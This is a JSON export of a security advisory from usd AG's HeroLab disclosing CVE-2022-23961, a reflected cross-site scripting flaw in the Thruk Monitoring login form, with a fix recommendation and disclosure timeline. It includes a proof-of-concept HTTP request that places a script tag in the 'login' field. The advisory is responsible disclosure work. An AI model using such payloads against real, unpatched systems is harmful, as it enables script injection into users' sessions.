{"id":17863,"date":"2022-02-18T15:05:36","date_gmt":"2022-02-18T14:05:36","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=17863"},"modified":"2022-02-21T08:29:17","modified_gmt":"2022-02-21T07:29:17","slug":"usd-2021-0034","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0034\/","title":{"rendered":"usd-2021-0034"},"content":{"rendered":"\n\n\n\n[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.14.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<h1>usd-2021-0034 (<span>CVE-2022-23961)<\/span> | Thruk Monitoring<\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2021-0034<br \/><strong>CVE ID<\/strong>: CVE-2022-23961<br \/><strong>CVE URL<\/strong>: <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-23961\" target=\"_blank\" rel=\"noopener\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-23961<\/a><br \/><strong>Affected Product<\/strong>: Thruk Monitoring<br \/><strong>Affected Version<\/strong>: &lt; v2.46.3<br \/><strong>Vulnerability Type<\/strong>: <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/79.html\" target=\"_blank\" rel=\"noopener\">CWE-79<\/a>: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br \/><strong>Security Risk<\/strong>: Medium<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.thruk.org\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.thruk.org\/<\/a><br \/><strong>Vendor Status<\/strong>: Fixed<\/p>\n<h3>Description<\/h3>\n<p>At Thruk Monitoring's login form prior <em>v2.46.3<\/em>, the field \"login\" is vulnerable to reflected XSS payloads.<\/p>\n<p>Submitting invalid values into the login form's name field called \"login\" results in the output of detailed error messages. The error message contains the submitted value to the login form in plain html without any encoding or filtering being applied. Consequently, on submitting an XSS payload, it is executed.<\/p>\n<p><span><\/span><\/p>\n<h3>Proof of Concept (PoC)<\/h3>\n<p>The following request includes JavaScript within the \"login\" parameter:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<p>POST \/pv\/thruk\/cgi-bin\/login.cgi HTTP\/1.1<br \/>Host: thruk.example.com<br \/>Cookie: thruk_tz=Europe\/Berlin; thruk_screen={\"height\":555,\"width\":999}<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 75<br \/>Origin: https:\/\/thrug.example.com<br \/>Referer: https:\/\/thrug.example.com\/pv\/thruk\/cgi-bin\/login.cgi?pv\/omd\/<br \/>Upgrade-Insecure-Requests: 1<br \/>Te: trailers<br \/>Connection: close<\/p>\n<p>referer=%2Fpv%2Fomd%2F&amp;login=adfa&lt;script&gt;alert('XSS')&lt;\/script&gt;&amp;password=adf<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.14.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<p>As the following screenshot indicates, the above JavaScript is embedded within the application and executed:<\/p>[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/thruk-xss.png\" title_text=\"thruk-xss\" _builder_version=\"4.14.7\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.14.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p>It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.<\/p>\n<h3>References<a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/918.html\" target=\"_blank\" rel=\"noopener\"><\/a><\/h3>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/79.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/79.html<\/a><\/li>\n<li><a href=\"https:\/\/owasp.org\/www-community\/attacks\/xss\/\" target=\"_blank\" rel=\"noopener\">https:\/\/owasp.org\/www-community\/attacks\/xss\/<\/a><\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>\n<p data-pm-slice=\"1 1 []\">2021-12-16<span style=\"font-size: 16px\">: This vulnerability was identified by Markus Ritter.<\/span><\/p>\n<\/li>\n<li>2021-12-17: Initial contact attempt with maintainer via e-mail.<\/li>\n<li>2022-01-14: Second contact attempt via e-mail.<\/li>\n<li>2022-01-14: Submission of vulnerability details via encrypted e-mail.<\/li>\n<li>\n<p data-pm-slice=\"1 1 []\">2022-01-25: <span>CVE-2022-23961 is assigned.\u00a0<\/span><\/p>\n<\/li>\n<li>2022-01-25: Maintainer releases fix with version v2.46.3: <a href=\"https:\/\/www.thruk.org\/changelog.html#_v2-463\" target=\"_blank\" rel=\"noopener\">https:\/\/www.thruk.org\/changelog.html#_v2-463<\/a>.<\/li>\n<li>2022-02-18: Security advisory released by usd AG.<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Markus Ritter of usd AG.<\/p>\n<\/div>\n<\/div>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]\n\n\n\n","protected":false},"excerpt":{"rendered":"<p>usd-2021-0034 (CVE-2022-23961) | Thruk Monitoring Advisory ID: usd-2021-0034CVE ID: CVE-2022-23961CVE URL: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-23961Affected Product: Thruk MonitoringAffected Version: &lt; v2.46.3Vulnerability Type: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')Security Risk: MediumVendor URL: https:\/\/www.thruk.org\/Vendor Status: Fixed Description At Thruk Monitoring's login form prior v2.46.3, the field \"login\" is vulnerable to reflected XSS payloads. Submitting invalid [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":17032,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-17863","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/17863","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=17863"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/17863\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media\/17032"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=17863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}